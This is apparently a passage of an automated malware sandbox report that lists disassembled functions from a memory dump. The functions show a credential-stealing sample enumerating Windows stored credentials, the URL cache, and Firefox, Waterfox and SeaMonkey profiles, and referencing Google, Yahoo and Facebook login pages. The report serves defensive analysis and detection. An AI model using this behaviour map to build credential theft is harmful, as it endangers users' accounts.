                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                          • API String ID: 62308376-4196376884
                                                                                                                                                                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                          • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3191383707-0
                                                                                                                                                                                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                          • API String ID: 3527940856-11920434
                                                                                                                                                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                          • API String ID: 3527940856-2068335096
                                                                                                                                                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                          • memset.MSVCRT ref: 00404020
                                                                                                                                                                                          • memset.MSVCRT ref: 00404035
                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                          • API String ID: 3527940856-3369679110
                                                                                                                                                                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                                                                                                          • Opcode ID: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                                                          • String ID: $0.@
                                                                                                                                                                                          • API String ID: 3030842498-1896041820
                                                                                                                                                                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2941347001-0
                                                                                                                                                                                          • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                          • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                          • API String ID: 3249829328-1174173950
                                                                                                                                                                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 669240632-0
                                                                                                                                                                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                                                                                                          • memset.MSVCRT ref: 00408870
